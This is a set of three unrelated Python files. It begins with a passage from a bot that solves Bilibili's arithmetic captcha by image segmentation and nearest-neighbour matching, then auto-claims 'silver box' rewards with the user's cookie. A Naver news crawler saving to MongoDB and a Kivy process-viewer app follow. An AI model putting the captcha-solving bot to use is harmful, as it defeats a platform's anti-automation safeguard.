if cut_col==0 and len(mmp[0])>55 and cutctr!=3:
for jj in range(45,55):
col_color=0
for ii in range(len(mmp)):
if mmp[ii][jj]!=0:
col_color+=1
if col_color<least_color:
least_color=col_color
if least_color<6:
cut_col=jj
#print('leastcolor:%d' % least_color)
#print('cut_col:%d' % cut_col)
re1=a.crop((0,0,cut_col,len(mmp)))
re2=a.crop((cut_col+1,0,len(mmp[0]),len(mmp)))
#if cut_col>102:
#re1.show()
#re1.save(os.path.dirname(sys.path[0])+'\\WA'+input('文件名:')+'.gif')
return re1,re2
def compare_study_and_example(exam_map):
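# Recognize the captcha: split it into four glyphs; the third glyph is
# classified as '+' or '-' by its pixel count, the others are centred on a
# 250x250 canvas and matched against the saved samples in the '学习' folder
# with a 3-nearest-neighbour vote. Returns the computed arithmetic result,
# the list of recognized glyphs and an "is_okay" flag.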
study_dir=os.path.dirname(sys.path[0])+'\\学习'
study_list=os.listdir(study_dir)
source_init=Image.new('L',(250,250))
source_init_idx=np.array(source_init)
distinguish_text=[]
is_okay=1
for repeat4times in range(4):
splited,rest=split_text_on_pic(exam_map,repeat4times)
#splited.save(os.path.dirname(sys.path[0])+'\\WAc%d.gif' % repeat4times)
#Image.fromarray(exam_map).show()
#rest.show()
arrsplited=np.array(splited)
if repeat4times==2:
if splited.size[0]==0:
distinguish_text[1]=1
distinguish_text.append('-')
is_okay=0
continue
pix_counter=0
for ii in range(len(arrsplited)):
for jj in range(len(arrsplited[ii])):
if arrsplited[ii][jj]!=0:
pix_counter=pix_counter+1
#print(pix_counter)
if pix_counter>1400:
distinguish_text.append('+')
print('+')
else:
distinguish_text.append('-')
print('-')
else:
if repeat4times==3:
arrsplited=np.array(rest)
rrr,ccc=center_of_gravity(arrsplited)
#if repeat4times!=3 and splited.size[0]==0:
#split_text_on_pic(np.array(chk_before))
mr=125-rrr
mc=125-ccc
for ii in range(len(arrsplited)):
for jj in range(len(arrsplited[ii])):
if ii+mr>=250 or jj+mc>=250:  # guard against writing outside the 250x250 canvas
continue
source_init_idx[ii+mr][jj+mc]=arrsplited[ii][jj]
source_init=Image.fromarray(source_init_idx)
DistLeaderboard=[]
TagsLeaderboard=[]
for sample in study_list:
file_name=study_dir+'\\'+sample
#print(file_name)
now=np.array(Image.open(file_name))
#print(now)
study_init=Image.new('L',(250,250))
study_init_idx=np.array(study_init)
rrr,ccc=center_of_gravity(now)
mr=125-rrr
mc=125-ccc
for ii in range(len(now)):
for jj in range(len(now[ii])):
if ii+mr>=250 or jj+mc>=250:  # guard against writing outside the 250x250 canvas
continue
study_init_idx[ii+mr][jj+mc]=now[ii][jj]*255  # without this *255 the preview image looks much worse
#print(study_init)
study_init=Image.fromarray(study_init_idx)
DistLeaderboard.append(sum(sum((source_init_idx-study_init_idx)**2)))
TagsLeaderboard.append(sample[:1])
ranking=np.argsort(DistLeaderboard)
TagsCounter={}
for kk in range(3):#knn
CurrentTag=TagsLeaderboard[ranking[kk]]
TagsCounter[CurrentTag]=TagsCounter.get(CurrentTag,0)+1
MaxTagCtr=0
for CurrentTag,Number in TagsCounter.items():
if Number>MaxTagCtr:
MaxTagCtr=Number
ResultTag=CurrentTag
print(ResultTag)
#with open(os.path.dirname(sys.path[0])+'\\res.txt','a') as fi:
# fi.write(ResultTag+'\n')
distinguish_text.append(ResultTag)
exam_map=np.array(rest.crop(scan_dark_pixs(rest)))
chk_before=splited
#rest.crop(scan_dark_pixs(rest)).save(os.path.dirname(sys.path[0])+'\\Wcropc%d.gif' % repeat4times)
#print(distinguish_text)
if distinguish_text[2]=='+':
return int(distinguish_text[0])*10+int(distinguish_text[1])+int(distinguish_text[3]),distinguish_text,is_okay
else:
return int(distinguish_text[0])*10+int(distinguish_text[1])-int(distinguish_text[3]),distinguish_text,is_okay
def figure_fst_and_last(mymap):  # find the row/column of the first and last white pixels in the matrix (used together with rotation); return their rows and columns
fst=0
for ii in range(len(mymap)):
for jj in range(len(mymap[ii])):
if mymap[ii][jj]!=0:
if fst==0:
fst_raw=ii
fst_col=jj
fst=1
last_raw=ii
last_col=jj
return fst_raw,fst_col,last_raw,last_col
def rotate_check(mmp):  # try small rotations of the input matrix and return the most upright image together with the best angle
#print('#####################new img#######################')
fst=0
fst_raw,fst_col,last_raw,last_col=figure_fst_and_last(mmp)
leasthei=last_raw-fst_raw
leastdeg=rotdeg=0
leastmap=mmp
if fst_col<last_col:
for rotdeg in range(1,50):
tp_map=np.array(Image.fromarray(mmp).rotate(rotdeg))
fst_raw,fst_col,last_raw,last_col=figure_fst_and_last(tp_map)
#print('rotdeg:%d,hei:%d,lhei:%d' % (rotdeg,last_raw-fst_raw,leasthei))
if last_raw-fst_raw<leasthei:
leasthei=last_raw-fst_raw
leastmap=tp_map
leastdeg=rotdeg
elif last_raw-fst_raw>leasthei:
break
else:
for rotdeg in range(0,-50,-1):
tp_map=np.array(Image.fromarray(mmp).rotate(rotdeg))
fst_raw,fst_col,last_raw,last_col=figure_fst_and_last(tp_map)
#print('rotdeg:%d,hei:%d,lhei:%d' % (rotdeg,last_raw-fst_raw,leasthei))
if last_raw-fst_raw<leasthei:
leasthei=last_raw-fst_raw
leastmap=tp_map
leastdeg=rotdeg
elif last_raw-fst_raw>leasthei:
break
return Image.fromarray(leastmap),leastdeg
def shadow_split(arrays):  # separate the grey edge of the image (used to find the centre of gravity and shift the image); take the original matrix, return the grey-edge matrix
w=255
b=37
zero_one_map=[]
for col in arrays:
zero_one_map_col=[]
for single_var in col:
if single_var!=w and single_var!=b:
zero_one_map_col.append(255)
else:
zero_one_map_col.append(0)
zero_one_map.append(zero_one_map_col)
#with open(os.path.dirname(sys.path[0])+'\\shadow.gif') as fii:
#Image.fromarray(np.array(zero_one_map)).show()
#os.system('pause')
return np.array(zero_one_map)
def center_of_gravity(map_source):  # compute the centre of gravity (could be merged into the function above); take a matrix, return the row and column of the centre
pctr=sumr=sumc=0
for rr in range(len(map_source)):
for cc in range(len(map_source[rr])):
if map_source[rr][cc]!=0:
pctr=pctr+1
sumr=sumr+rr
sumc=sumc+cc
#print('another algorithm:%d,%d' % (round(sumr/pctr),round(sumc/pctr)))
nearest_c=round(sumc/pctr)
nearest_r=round(sumr/pctr)
return nearest_r,nearest_c
def scan_dark_pixs(pic):  # find the dark border; take an image, return a crop tuple exactly tangent to that border
mmp=np.array(pic)
hei=len(mmp)
wid=len(mmp[0])
hitari=migi=shita=ue=0
for iii in range(hei):
for jjj in range(wid):
if mmp[iii][jjj]!=0:
ue=iii
break
if ue!=0:
break
for jjj in range(wid):
for iii in range(hei):
if mmp[iii][jjj]!=0:
hitari=jjj
break
if hitari!=0:
break
for iii in range(hei-1,-1,-1):
for jjj in range(wid-1,-1,-1):
if mmp[iii][jjj]!=0:
shita=iii+1
break
if shita!=0:
break
for jjj in range(wid-1,-1,-1):
for iii in range(hei-1,-1,-1):
if mmp[iii][jjj]!=0:
migi=jjj+1
break
if migi!=0:
break
tur=(hitari-1,ue-1,migi,shita)
#print(tur)
return tur
def make_req(ck):
ac='application/json, text/plain, */*'
ace='gzip, deflate, sdch, br'
acl='zh-CN,zh;q=0.8'
cn='keep-alive'
hst='api.live.bilibili.com'
ogn='https://live.bilibili.com'
ref='https://live.bilibili.com/546432'
ua='Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'
hds={
'Accept':ac,
'Accept-Encoding':ace,
'Accept-Language':acl,
'Connection':cn,
'Cookie':ck,
'Host':hst,
'Origin':ogn,
'Referer':ref,
'User-Agent':ua
}
lnk='https://api.live.bilibili.com/lottery/v1/SilverBox/getCaptcha?ts=%d' % int(time.time())
req=requests.get(lnk,headers=hds)
json_convert=json.loads(req.content)
pngf=base64.b64decode(json_convert['data']['img'][23:])
with open(os.path.dirname(sys.path[0])+'\\'+'temp.png','wb') as f:
f.write(pngf)
return open(os.path.dirname(sys.path[0])+'\\'+'temp.png','rb')
def getCurrentTask(ck):
url='https://api.live.bilibili.com/lottery/v1/SilverBox/getCurrentTask'
hds={
'Accept':'application/json, text/plain, */*',
'Accept-Encoding':'gzip, deflate, sdch, br',
'Accept-Language':'zh-CN,zh;q=0.8',
'Connection':'keep-alive',
'Cache-Control':'no-cache',
'Connection':'keep-alive',
'Cookie':ck,
'Host':'api.live.bilibili.com',
'Origin':'https://live.bilibili.com',
'Referer':'https://live.bilibili.com/546432',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'
}
req=requests.get(url,headers=hds)
jjson=json.loads(req.content)
# print(jjson['data']['minute'])
# print(jjson['data']['time_start'])
# print(jjson['data']['time_end'])
return jjson['data']['time_start'],jjson['data']['time_end']
def getAward(ck,vercode_data,proimg,dislist,istu,iso,timeS,timeE):
lnk='https://api.live.bilibili.com/lottery/v1/SilverBox/getAward?time_start=%d&end_time=%d&captcha=%d' % (timeS,timeE,vercode_data)
hds={
'Accept':'application/json, text/plain, */*',
'Accept-Encoding':'gzip, deflate, sdch, br',
'Accept-Language':'zh-CN,zh;q=0.8',
'Connection':'keep-alive',
'Cache-Control':'no-cache',
'Cookie':ck,
'Host':'api.live.bilibili.com',
'Origin':'https://live.bilibili.com',
'Referer':'https://live.bilibili.com/1',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'
}
response_raw=requests.get(lnk,headers=hds)
#print(response_raw.content)
convertJson=json.loads(response_raw.content)
print(convertJson)
#lbmsg.set(convertJson)
statusText.config(state=tk.NORMAL)
#statusText.insert(tk.END,convertJson['msg']+'\n')
currentTime=time.asctime(time.localtime(time.time()))
if convertJson['msg']=='ok':
print('领取成功,获得瓜子:%s,当前瓜子为%s。' % (convertJson['data']['awardSilver'],convertJson['data']['silver']))
statusText.insert(tk.END,'%s:领取成功,获得瓜子:%s,当前瓜子为%s。\n' % (currentTime,convertJson['data']['awardSilver'],convertJson['data']['silver']))
study_(proimg,istu,iso)
statusText.config(state=tk.DISABLED)
def study_(giff,swi,chk):
if swi==1 and chk==1:
print('开始学习')
for studying in range(4):
matrix_a,matrix_b=split_text_on_pic(giff,studying)
if studying==3:
targ=matrix_b
else:
targ=matrix_a
for name_ctr in range(10):
if studying==2:
break
if os.path.exists(os.path.dirname(sys.path[0])+'\\学习\\'+dislist[studying]+'-'+str(name_ctr)+'.gif'):
continue
else:
print(targ)
targ=targ.crop(scan_dark_pixs(targ))
targ.save(os.path.dirname(sys.path[0])+'\\学习\\'+dislist[studying]+'-'+str(name_ctr)+'.gif')
#Image.fromarray(targ).crop(scan_dark_pixs(Image.fromarray(targ))).save(os.path.dirname(sys.path[0])+'\\学习\\'+dislist[studying]+'-'+str(name_ctr)+'.gif')
print('保存学习文件:'+dislist[studying]+'-'+str(name_ctr)+'.gif')
statusText.config(state=tk.NORMAL)
statusText.insert(tk.END,'保存学习文件:'+dislist[studying]+'-'+str(name_ctr)+'.gif\n')
statusText.config(state=tk.DISABLED)
break
giff=np.array(matrix_b.crop(scan_dark_pixs(matrix_b)))
else:
print('学习开关已关闭或分割出现问题不能学习')
#init_ck=input('请输入您的cookie【仅用于申请验证码】:')
def statuswin():
print('GUI线程启动')
global win
win=tk.Tk()
win.title("状态窗")
win.geometry('600x600')
# global lbmsg
# lbmsg=tk.StringVar()
# lbwin=tk.Label(win,textvariable=lbmsg).pack()
# lbmsg.set('有状态的话会显示在这里哦')
global statusText
statusText=tk.Text(win,width=70,height=40)
statusText.insert(tk.END,'这里是状态显示栏\n')
statusText.config(state=tk.DISABLED)
statusText.pack()
global cav
cav=tk.Canvas(win,width=300,height=21,bg="white")
#x=tk.StringVar()
outRec=cav.create_rectangle(5,5,300,20,outline="green",width=1)
global fillRec
fillRec=cav.create_rectangle(5,5,5,20,outline="",width=0,fill="green")
cav.pack()
win.mainloop()
def updatePb(cur,allpro):
cav.coords(fillRec,(5,5,6+(cur/allpro)*295,20))
win.update()
def update_in_time(ifstu):
t1=threading.Thread(target=statuswin,args=())
t2=threading.Thread(target=deathloop,args=(ifstu,))
t1.start()
t2.start()
t1.join()
t2.join()
def deathloop(is_study):
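# Main worker loop: wait until the current silver-box task becomes claimable,
# download the captcha, preprocess it (grey-edge extraction, centring, resize,
# rotation, dot detection), recognize the arithmetic expression and then call
# getAward to claim the reward (optionally saving training samples).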
init_ck=stv
while True:
timeS,timeE=getCurrentTask(init_ck)
if int(time.time())<timeE:
print('领取时间戳:%d,当前时间戳:%d,等待%d秒' % (timeE,time.time(),timeE-int(time.time())+1))
statusText.config(state=tk.NORMAL)
statusText.insert(tk.END,'领取时间戳:%d,当前时间戳:%d,等待%d秒\n' % (timeE,time.time(),timeE-int(time.time())+1))
statusText.config(state=tk.DISABLED)
#lbmsg.set('领取时间戳:%d,当前时间戳:%d,等待%d秒' % (timeE,time.time(),timeE-int(time.time())+1))
time.sleep(timeE-int(time.time())+1)
grey_png=Image.open(make_req(init_ck)).convert('L')
#try:
arr=np.array(grey_png)
zomap=shadow_split(arr)
gc_r,gc_c=center_of_gravity(zomap)
global mov_c
global mov_r
mov_r=gc_r-20
mov_c=gc_c-60
new_map=cp.deepcopy(zomap)
new_png=cp.deepcopy(arr)
for ii in range(len(new_map)):
for jj in range(len(new_map[ii])):
new_map[ii][jj]=0
new_png[ii][jj]=0
for ii in range(len(zomap)):
for jj in range(len(zomap[ii])):
if ii-mov_r>=40 or jj-mov_c>=120:
continue
new_map[ii-mov_r][jj-mov_c]=zomap[ii][jj]
new_png[ii-mov_r][jj-mov_c]=arr[ii][jj]
ig=Image.fromarray(new_map)
new_map=np.array(ig.resize((960,320)))
new_img,dg=rotate_check(new_map)
revis=scan_dark_pixs(new_img)
revi=new_img.crop(revis)
processed_gp=Image.fromarray(new_png).resize((960,320)).rotate(dg).crop(revis)
rou_dot_map=check_dot(np.array(processed_gp))
rdm_img=Image.fromarray(rou_dot_map).crop(scan_dark_pixs(Image.fromarray(rou_dot_map)))
global dislist
distinguish_result,dislist,is_okay=compare_study_and_example(np.array(rdm_img))
print('识别计算结果为:',end='')
print(distinguish_result)
# except:
# print('程序出错,开始备份错误图片文件')
# debugi=0
# for debugi in range(20):
# if os.path.exists(os.path.dirname(sys.path[0])+'\\BUG_%d' % debugi):
# continue
# else:
# os.system('ren temp.png BUG_%d.png' % debugi)
# break
# distinguish_result=39
# is_okay=0
getAward(init_ck,distinguish_result,np.array(rdm_img),dislist,is_study,is_okay,timeS,timeE)
# GUI module
def subm1():
print(ent)
global stv
stv=ent.get('1.0',tk.END)[:-1]
rt.destroy()
#print(stv.get())
global rt2
rt2=tk.Tk()
rt2.title("请确认是否开启学习开关")
rt2.geometry('300x100')
bb=tk.Button(rt2,text='启用学习开关',width=15,height=2,command=bton).pack()
bbb=tk.Button(rt2,text='禁用学习开关',width=15,height=2,command=btoff).pack()
rt2.mainloop()
def bton():
rt2.destroy()
update_in_time(1)
def btoff():
rt2.destroy()
update_in_time(0)
rt=tk.Tk()
#stv=tk.StringVar()
rt.title("GUI测试:请输入您的cookie【仅用于申请验证码】:")
rt.geometry('400x250')
ent=tk.Text(rt,width=50,height=15)
ent.pack()
bt=tk.Button(rt,text='确定',width=15,height=2,command=subm1).pack()
rt.mainloop()
#is_study=int(input('是否开启学习开关?输入1以开启'))
|
articlecrawler.py
|
from time import sleep
from bs4 import BeautifulSoup
from exceptions import *
from multiprocessing import Process
from articleparser import ArticleParser
import os
import calendar
import re
import requests
import pymongo
import urllib.request
from settings import *
class ArticleCrawler(object):
def __init__(self):
self.parser = ArticleParser()
self.category = {'정치': 100, '경제': 101, '사회': 102, '생활문화': 103,'세계':104, 'IT과학': 105}
self.selected_category = []
self.date = {'start_year': 0, 'end_year': 0, 'end_month': 0}
def set_category(self, *args):
for key in args:
if self.category.get(key) is None:
raise InvalidCategory(key)
else:
self.selected_category = args
def set_date_range(self, start_year, end_year, end_month):
args = [start_year, end_year, end_month]
if start_year > end_year:
raise InvalidYear(start_year, end_year)
if end_month < 1 or end_month > 12:
raise InvalidMonth(end_month)
for key, date in zip(self.date, args):
self.date[key] = date
print(self.date)
def make_news_page_url(self, category_url, start_year, last_year, start_month, last_month):
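# Build the full list of article-list URLs: one URL per day in the requested
# range, expanded to one URL per pagination page (the real page count is
# discovered via the page=1000 redirect trick below).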
maked_url = []
final_startmonth = start_month
final_lastmonth = last_month
for year in range(start_year, last_year + 1):
if year != last_year:
start_month = 1
last_month = 12
else:
start_month = final_startmonth
last_month = final_lastmonth
for month in range(start_month, last_month + 1):
for month_day in range(1, calendar.monthrange(year, month)[1] + 1):
url = category_url
if len(str(month)) == 1:
month = "0" + str(month)
if len(str(month_day)) == 1:
month_day = "0" + str(month_day)
url = url + str(year) + str(month) + str(month_day)
final_url = url # temporarily store the URL that has only the date and no page parameter
# totalpage: exploit the Naver page structure by requesting page=1000 to discover the real total page count
# since page=1000 does not exist, Naver redirects to page=totalpage
totalpage = self.parser.find_news_totalpage(final_url + "&page=1000")
for page in range(1, totalpage + 1):
url = final_url # reset the URL to the page-less base
url = url + "&page=" + str(page)
maked_url.append(url)
return maked_url
def crawling(self, category_name):
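# Crawl every article of the given category for the configured date range:
# fetch each list page, follow each article link, extract headline, body,
# publisher and lead image, download the image and store a document in MongoDB.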
# per-category process PID
print(category_name + " PID: " + str(os.getpid()))
# if this doesn't work, I'll cry
file_name = 'Article_'+str(self.category[category_name])
conn = pymongo.MongoClient(
'mongodb://%s:%s@%s:%s/' % (MONGODB_USERID, MONGODB_PASSWORD, MONGODB_HOST, MONGODB_PORT))
print(conn)
db = conn.get_database(MONGODB_DATABASE)
collection = db[file_name]
# article list URL format
url = "http://news.naver.com/main/list.nhn?mode=LSD&mid=sec&sid1=" + str(
self.category.get(category_name)) + "&date="
# collect articles from January of start_year through end_month of end_year
final_urlday = self.make_news_page_url(url, self.date['start_year'], self.date['end_year'], 1,
self.date['end_month'])
print(category_name + " Urls are generated")
print(final_urlday)
print(len(final_urlday))
print("크롤링 시작")
for URL in final_urlday:
regex = re.compile(r"date=(\d+)")
news_date = regex.findall(URL)[0]
request = requests.get(URL)
document = BeautifulSoup(request.content, 'html.parser')
tag_document = document.find_all('dt', {'class': 'photo'})
post = []
row = 0
for tag in tag_document:
post.append(tag.a.get('href')) # put the URL of every article on this page into the post list
for content_url in post: # article URL
# crawl delay
sleep(0.01)
# fetch the article HTML
request_content = requests.get(content_url)
document_content = BeautifulSoup(request_content.content, 'html.parser')
try:
# get the article headline
tag_headline = document_content.find_all('h3', {'id': 'articleTitle'}, {'class': 'tts_head'})
text_headline = '' # initialize the headline
text_headline = text_headline + self.parser.clear_headline(str(tag_headline[0].find_all(text=True)))
if not text_headline: # skip the article if the headline is empty
continue
# get the article body
tag_content = document_content.find_all('div', {'id': 'articleBodyContents'})
text_sentence = '' # initialize the body text
text_sentence = text_sentence + self.parser.clear_content(str(tag_content[0].find_all(text=True)))
if not text_sentence: # skip the article if the body is empty
continue
# get the publisher (news company)
tag_company = document_content.find_all('meta', {'property': 'me2:category1'})
text_company = '' # initialize the company name
text_company = text_company + str(tag_company[0].get('content'))
if not text_company: # skip the article if the company is empty
continue
# get the article image
tag_image = document_content.find_all('span', {'class': 'end_photo_org'})
image_url = '' # initialize the image URL
image_url = image_url + str(tag_image[0].find('img')['src'])
image_path = "images/"+file_name+"_"+str(row)+"_"+str(news_date)+'.png'
urllib.request.urlretrieve(image_url, image_path)
row = row + 1
if not image_url: # skip the article if there is no image
continue
collection.insert_one({"data": {
"headline": text_headline,
"content": text_sentence,
"company": text_company,
"image": image_path
}})
except Exception as ex:
pass
def start(self):
# start crawling, one process per selected category
for category_name in self.selected_category:
proc = Process(target=self.crawling, args=(category_name,))
proc.start()
if __name__ == "__main__":
Crawler = ArticleCrawler()
Crawler.set_category("정치")
Crawler.set_date_range(2018, 2018, 1)
Crawler.start()
|
main.py
|
from psutil import process_iter, NoSuchProcess, cpu_count, AccessDenied
from kivymd.app import MDApp
from kivy.uix.screenmanager import Screen
from kivy.lang import Builder
from os.path import join as p_join
from kivy.clock import mainthread
from time import sleep
from threading import Thread, Lock
from kivy.metrics import dp
from utils import icon_path, this_dir # noqa
from widgets import MiniProcessCell, Navigator # noqa
from kivy.config import Config
Config.set('input', 'mouse', 'mouse,multitouch_on_demand')
del Config
Builder.load_file(p_join(this_dir, 'main.kv'))
del Builder
cpus = cpu_count()
del cpu_count
processes = {proc.pid: proc for proc in process_iter(['name', 'exe'])}
processes_lock = Lock()
def update_processes():
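# Refresh the global `processes` map: register new or renamed PIDs, and for
# PIDs that disappeared, deselect them, drop them from the map and update the
# selection label once at the end.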
global processes
temp_processes = {}
processes_lock.acquire()
for proc in process_iter(['name', 'exe']):
pid = proc.pid
temp_processes[pid] = proc
proc_now = processes.get(pid)
if (proc_now is None) or (proc.info['name'] != proc_now.info['name']):
processes[pid] = proc
update_label = False
for pid in [*processes]:
if pid not in temp_processes:
app.select_row(pid, False, label=False)
if pid in app.current_selection:
app.current_selection.remove(pid)
del processes[pid]
update_label = True
if update_label:
app.update_selection_label()
processes_lock.release()
def always_updating_processes():
while True:
update_processes()
sleep(1)
class Main(Screen):
def __init__(self, **kw):
self.data_lock = Lock()
self.scroll_lock = Lock()
self.answer_lock = Lock()
self.answered = self.ordered = False
self.visible_range = range(0)
self.special_order_cells = []
self.order_cells = []
self.answerers = []
self.last_search = None
self.order_by = order_by = Killer.killer_config["order_by"]
if order_by == "proc_name":
self.key_func = lambda c: c["proc_name"].lower()
else:
self.key_func = lambda c: c[order_by]  # replaced by order() when the user changes the ordering
self.reverse = Killer.killer_config["desc"]
super().__init__(**kw)
def on_scroll_start(instance, event):
if not self.scroll_lock.locked():
if event.is_mouse_scrolling:
pos = instance.scroll_y
if pos >= 1 or pos <= 0:
return
Thread(target=self.scroll_lock.acquire, daemon=True).start()
def on_scroll_stop(*args): # noqa
if self.scroll_lock.locked():
Thread(target=self.scroll_lock.release).start()
def on_touch_up(*args): # noqa
if self.scroll_lock.locked():
Thread(target=self.scroll_lock.release).start()
self.ids.rv.bind(on_scroll_start=on_scroll_start,
on_scroll_stop=on_scroll_stop,
on_touch_up=on_touch_up
)
@mainthread
def assign_data(self, data):
self.ids.rv.data = data
@mainthread
def set_multiple_select(self, active):
self.ids.multiple_select.active = active
def new_special_order_cell(self, proc, proc_pid, proc_name, cpu, mem):
proc_cpu = proc_mem = 0.0
proc_exe = proc.info['exe']
proc_icon = icon_path(proc_exe, proc_name)
try:
if cpu:
proc_cpu = proc.cpu_percent(app.refresh_interval) / cpus
if mem:
proc_mem = proc.memory_percent()
except NoSuchProcess:
pass
cell = {"proc_pid": proc_pid,
"proc_icon": proc_icon,
"proc_name": proc_name,
"proc_cpu": proc_cpu,
"proc_mem": proc_mem}
self.special_order_cells.append(cell)
def correct_special_order_cell(self, index, cpu, mem):
cell = self.special_order_cells[index]
proc_pid = cell['proc_pid']
proc = processes[proc_pid]
try:
if cpu:
cell["proc_cpu"] = proc.cpu_percent(app.refresh_interval) / cpus
if mem:
cell["proc_mem"] = proc.memory_percent()
except NoSuchProcess:
pass
def special_order_update_data(self):
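# Used when sorting by CPU or memory: build one cell per (search-filtered)
# process, sampling only the sort column for every process, sort the cells,
# then fill in the remaining column just for the currently visible rows.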
search = self.ids.search_field.text.lower()
cpu = self.order_by == "proc_cpu"
mem = self.order_by == "proc_mem"
self.special_order_cells = []
singles = []
correct_singles = []
processes_lock.acquire()
for proc_pid, proc in processes.items():
proc_name = proc.info['name']
if (not search) or (search in f'{proc_pid}{proc_name.lower()}'):
new_special_order_cell_thread = Thread(target=self.new_special_order_cell,
args=(proc, proc_pid, proc_name, cpu, mem))
new_special_order_cell_thread.start()
singles.append(new_special_order_cell_thread)
for single in singles:
single.join()
self.special_order_cells = sorted(self.special_order_cells, key=self.key_func, reverse=self.reverse)
data_max = len(self.special_order_cells)
for index in self.visible_range:
if index >= data_max:
break
correct_special_order_cell_thread = \
Thread(target=self.correct_special_order_cell, args=(index, not cpu, not mem))
correct_special_order_cell_thread.start()
correct_singles.append(correct_special_order_cell_thread)
for single in correct_singles:
single.join()
processes_lock.release()
self.update_data_base(self.special_order_cells)
def correct_order_cell(self, index, cpu=True, mem=True):
cell = self.order_cells[index]
proc_pid = cell['proc_pid']
proc = processes[proc_pid]
try:
with proc.oneshot():
if cpu:
cell["proc_cpu"] = proc.cpu_percent(app.refresh_interval) / cpus
if mem:
cell["proc_mem"] = proc.memory_percent()
except NoSuchProcess:
pass
def order_update_data(self):
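# Used when sorting by PID or name: build the (search-filtered) cell list with
# zeroed CPU/memory, sort it, then sample CPU and memory only for the rows that
# are currently visible before pushing the data to the RecycleView.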
search = self.ids.search_field.text.lower()
self.order_cells = []
correct_singles = []
processes_lock.acquire()
for proc_pid, proc in processes.items():
proc_name = proc.info["name"]
if (not search) or (search in f'{proc_pid}{proc_name.lower()}'):
proc_exe = proc.info["exe"]
proc_icon = icon_path(proc_exe, proc_name)
cell = {"proc_pid": proc_pid,
"proc_icon": proc_icon,
"proc_name": proc_name,
"proc_cpu": 0.0,
"proc_mem": 0.0}
self.order_cells.append(cell)
self.order_cells = sorted(self.order_cells, key=self.key_func, reverse=self.reverse)
data_max = len(self.order_cells)
if self.last_search is not None and len(self.ids.search_field.text) < len(self.last_search):
self.update_data_base(self.order_cells)
self.last_search = None
for index in self.visible_range:
if index >= data_max:
break
correct_order_cell_thread = Thread(target=self.correct_order_cell, args=(index, True, True))
correct_order_cell_thread.start()
correct_singles.append(correct_order_cell_thread)
for single in correct_singles:
single.join()
processes_lock.release()
self.update_data_base(self.order_cells)
def first_update_data(self):
order_cells = []
processes_lock.acquire()
for proc_pid, proc in processes.items():
proc_name = proc.info["name"]
proc_exe = proc.info["exe"]
proc_icon = icon_path(proc_exe, proc_name)
cell = {"proc_pid": proc_pid,
"proc_icon": proc_icon,
"proc_name": proc_name,
"proc_cpu": 0.0,
"proc_mem": 0.0}
order_cells.append(cell)
processes_lock.release()
order_cells = sorted(order_cells, key=self.key_func, reverse=self.reverse)
self.assign_data(order_cells)
def update_data_base(self, new_data):
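# Push freshly built data to the RecycleView unless a fast search answer or a
# manual re-ordering just updated it (in that case only clear the flags),
# waiting for any ongoing scroll (scroll_lock) and data access (data_lock) first.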
if not self.answer_lock.locked():
if not self.answered and not self.ordered:
with self.data_lock:
with self.scroll_lock:
self.assign_data(new_data)
else:
self.answered = self.ordered = False
def always_updating_data(self):
while True:
if self.order_by in {"proc_cpu", "proc_mem"}:
self.special_order_update_data()
else:
self.order_update_data()
def order(self, order_by, reverse):
if order_by == "proc_name":
self.key_func = lambda c: c["proc_name"].lower()
else:
self.key_func = lambda c: c[order_by]
self.reverse = reverse
self.order_by = order_by
self.ordered = True
with self.data_lock:
temp_data = sorted(self.ids.rv.data, key=self.key_func, reverse=reverse)
self.assign_data(temp_data)
self.ordered = True
def set_visible_range(self):
rv = self.ids.rv
to_local = rv.to_local
center_x = rv.center_x
get_view_index_at = rv.layout_manager.get_view_index_at
try:
top_pos = to_local(center_x, rv.height)
top_i = get_view_index_at(top_pos)
bottom_pos = to_local(center_x, 0)
bottom_i = get_view_index_at(bottom_pos)
self.visible_range = range(top_i, bottom_i + 1)
except TypeError:
pass # random kivy error
def always_setting_visible_range(self):
while True:
self.set_visible_range()
sleep(0.1)
def fast_answer(self, search):
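# Give an immediate search result by filtering the rows already displayed, in a
# background thread; answerers_control keeps answer_lock held while these fast
# answers are pending so the periodic refresh does not overwrite them.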
if search == "":
return
if not self.answer_lock.locked():
from threading import Event
start_event = Event()
Thread(target=self.answerers_control, args=(start_event,)).start()
else:
start_event = None
fast_thread = Thread(target=self.fast_answer_base, args=(search,))
fast_thread.start()
self.answerers.append(fast_thread)
if start_event is not None:
start_event.set()
def answerers_control(self, start_event):
self.answer_lock.acquire()
start_event.wait()
while self.answerers:
fast_thread = self.answerers.pop(0)
fast_thread.join()
self.answered = True
self.answer_lock.release()
def fast_answer_base(self, search):
temp_data = []
for cell in self.ids.rv.data:
if search in f'{cell["proc_pid"]}{cell["proc_name"].lower()}':
temp_data.append(cell)
self.assign_data(temp_data)
self.last_search = search
class Killer(MDApp):
from kivy.properties import StringProperty, ListProperty, NumericProperty, BooleanProperty
version = StringProperty(None, allownone=True)
update = StringProperty(None, allownone=True)
current_selection = ListProperty()
from json import load
killer_config_file = p_join(this_dir, 'killer_config.json')
with open(killer_config_file, "r") as killer_read_file:
killer_config = load(killer_read_file)
del killer_read_file, load
zooms = {'0.5x': (32, 'Body2'),
'1x': (dp(48), 'Body1')}
z = killer_config['zoom']
zoom = StringProperty(z)
proc_height = NumericProperty(zooms[z][0])
proc_style = StringProperty(zooms[z][1])
del z
dark = BooleanProperty(killer_config['dark'])
desc = BooleanProperty(killer_config['desc'])
order_by = StringProperty(killer_config['order_by'])
refresh_interval = NumericProperty(killer_config['refresh_interval'])
del StringProperty, ListProperty, NumericProperty, BooleanProperty
@staticmethod
def on_zoom(self, value):
self.proc_height, self.proc_style = self.zooms[value]
Thread(target=self.update_config, args=('zoom', value)).start()
@staticmethod
def on_dark(self, value):
self.theme_cls.theme_style = "Dark" if value else "Light"
Thread(target=self.update_config, args=('dark', value)).start()
@staticmethod
def on_desc(self, value):
Thread(target=self.main.order, args=(self.order_by, value)).start()
Thread(target=self.update_config, args=('desc', value)).start()
@staticmethod
def on_order_by(self, value):
Thread(target=self.main.order, args=(value, self.desc)).start()
Thread(target=self.update_config, args=('order_by', value)).start()
@staticmethod
def on_refresh_interval(self, value):
Thread(target=self.update_config, args=('refresh_interval', value)).start()
def __init__(self, **kwargs):
self.icon = p_join(this_dir, 'icons\\Killer.exe.png')
